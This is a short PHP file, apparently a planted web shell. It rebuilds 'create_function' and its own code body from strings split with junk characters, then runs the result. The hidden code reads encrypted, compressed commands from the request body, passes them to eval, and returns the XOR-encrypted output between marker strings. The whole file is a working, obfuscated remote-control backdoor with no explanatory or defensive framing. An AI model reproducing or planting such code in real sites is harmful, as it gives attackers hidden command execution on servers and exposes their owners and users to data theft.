<br><b>
<body>
<?php
$r=str_replace('vf','','cvfvfrevfate_vfvffuvfnction');
$Q='$k="5YJ2363YJ63b";$YJkh="d4YJdfeeYJ5fc5dc";$kfYJ="3f32YJd35YJc6b5d"YJ;$pYJ="jd5W6YJfRRjJg23Rgi"YJ;YJfuncYJtioYJn x';
$n='get_contents();@obYJ_enYJYJd_clean();$r=@bYJaseYJ64_YJencode(@x(@gzcYJompYJressYJ($o),$k)YJ);printYJ("$YJp$kh$r$kf");}';
$M='($t,$k){$YJc=strlYJen(YJ$k);$l=YJstrlen($tYJYJ);$o="";foYJr($iYJ=0;$i<$l;){YJfor(YJYJ$j=0;($j<$c&&$iYJ<$l);$jYJ++,$';
$P='put"YJ),$mYJ)==YJYJ1){@ob_start();@eYJvalYJ(@gzuYJncYJompreYJss(@x(YJ@base6YJ4_decode($mYJYJ[1]),$YJkYJ)));$YJoYJ=@ob_';
$X='i+YJYJ+){$oYJ.=$t{$i}^$YJk{$j};}}rYJetuYJrn $o;}YJif(@pregYJYJ_matcYJhYJ("/$kh(.+)$kYJf/",@YJfileYJ_get_YJcontenYJts("php://in';
$H=str_replace('YJ','',$Q.$M.$X.$P.$n);
$B=$r('',$H);$B();
?>
